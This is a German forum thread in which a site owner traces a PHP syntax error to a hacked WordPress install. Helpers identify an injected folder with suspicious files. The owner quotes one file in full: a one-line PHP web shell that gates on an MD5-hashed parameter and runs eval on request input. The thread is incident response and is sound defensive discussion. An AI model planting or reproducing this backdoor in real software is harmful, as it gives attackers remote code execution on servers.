Seite nicht erreichbar - syntax error, unexpected

  • Hallo Zusammen,

    seit einigen Tagen ist meine Website nicht mehr erreichbar und ich kann mir gar nicht erklären, warum.

    Es erscheint beim Aufruf der Domain folgende Meldung:

    syntax error, unexpected '<' in /mnt/webg/b0/17/52901617/htdocs/index.php on line 18


    Weiß jemand, was das bedeutet?

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Hallo bienchen,

    Tipp: Die index.php herunterladen, mit einem Editor (z.B. Notepad++) die entsprechende Zeile suchen und das störende Zeichen entfernen. Dann Datei wieder hochladen.

    Oder die index.php durch eine originale Datei ersetzen. Dabei die vorhandene Datei durch umbenennen sichern.

  • Vorausgesetzt Du hast keine Veränderungen vorgenommen, in dem Du irgendetwas mit <einfügen oder verändern> wolltest, dann war es im schlimmsten Fall ein Hacker.

  • Hallo bienchen,

    Tipp: Die index.php herunterladen, mit einem Editor (z.B. Notepad++) die entsprechende Zeile suchen und das störende Zeichen entfernen. Dann Datei wieder hochladen.


    Meine Index-Dateien von 3.5.2 und 3.6 haben nur 17 Zeilen plus eine Leerzeile, da sollte wohl eigentlich nichts mehr folgen?

  • @Melowo

    ...dann war es im schlimmsten Fall ein Hacker.

    Daran habe ich auch schon gedacht. Es gibt auf dem Server einen neuen Ordner (seit dem 23.08.) mit Namen "enginei". Darin sind zwei Dateien sysy.asp und sysy.php

    Kann sich da jemand eingehackt haben???

  • Habe ich gemacht und jetzt funktioniert die Seite wieder. Allerdings kann ich den Fehler nicht nachvollziehen.


    Was hast Du gemacht, nur ausgetauscht und weißt nun nicht ob da etwas stand?
    Oder was stand in dieser Zeile?

  • Finde keine Beschreibung für eine sysy.php und wenn es sich um Malware handeln sollte, müsste die eigentlich irgendwo erwähnt werden.

    Einmal editiert, zuletzt von Melewo (26. August 2013 um 12:30)

  • Ich meine, Google erzählt mir:

    Zitat

    Es wurden keine mit Ihrer Suchanfrage - "enginei/sysy.php" - übereinstimmenden Dokumente gefunden.

    Zitat

    Es wurden keine mit Ihrer Suchanfrage - "enginei/sysy.asp" - übereinstimmenden Dokumente gefunden.

    Einzeln brauche ich nicht suchen, dann wird es zu ungenau.
    Schaue Dir einfach den Quellcode der Dateien an, ob da Kommentare enthalten sind.

  • Dieser Ordner existiert seit dem 23.08. - 3:32Uhr - schon etwas seltsam.


    In welchem Verzeichnis?
    Soll ja auch Plugins geben, die Verzeichnisse anlegen.
    Eine PHP-Datei enthält meistens den einen oder anderen Kommentar zwischen /* und */ oder hinter //.

  • Zitat

    <?php
    $s=@$_GET[2];if(md5($s.$s)=="e67c2597ecad64bb4cdad6633b04107f")@eval($_REQUEST[$s]);
    ?>

    So sieht der Inhalt der sysy.php aus

    Ein neues Plugin wurde seit langem nicht installiert.

  • ...ohje :-(

    Ich habe jetzt den Ordner mit den beiden Dateien gelöscht und ein Update auf 3.6 gemacht.
    Was meinst Du? Ist das Problem wohl damit behoben?

  • Ich muss mir das ja auch alles dreimal mit Translator durchlesen und dann versuchen zu verstehen, wie der Zugriff erfolgte. Passwörter solltest Du wohl auf jeden Fall erst einmal ändern.

  • Zitat

    Passwörter solltest Du wohl auf jeden Fall erst einmal ändern


    ... das werde ich machen.

    Zitat

    Ich muss mir das ja auch alles dreimal mit Translator durchlesen


    ... so geht´s mir auch.

    Vielleicht findest Du noch etwas raus.

    Vielen Dank für Deine Hilfe!!!

  • Wer es besser versteht oder besser übersetzen kann, mag es machen:

    Einzeiliger Code in einer Datei wird häufig von Hackern als zu einem Theme oder Plugin gehörende Datei verkleidet. Ist dies geschehen, wird wohl erst einmal geprüft, welche Möglichkeiten für einen Request bestehen und ob eine Index, eine htaccess oder ein Favicon zu finden sind, zumindest eine von diesen Dateien? Dann werden die Schreibrechte neu vergeben, Spam in die Seiten geschrieben und nach Möglichkeiten für eine Weiterverbreitung gesucht?

    So in etwa habe ich das zumindest verstanden. Kann sein, dass Deiner beim Versuch Spam in die Index zu schreiben, den Fehler auslöste und so keinen weiteren Schaden anrichtete.

    Hatte vergessen, Passwörter ändern genügt nicht, wenn ein Trojaner sich auf dem Rechner einistete, der die neuen Passwörter gleich wieder ausliest und sich per FTP Zugang verschafft. Somit solltest Du unbedingt auch Deinen Rechner prüfen.

    Von einer möglichen SQL-Injektion der Datenbank lese ich nichts, vielleicht hast Du auch da Glück gehabt.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!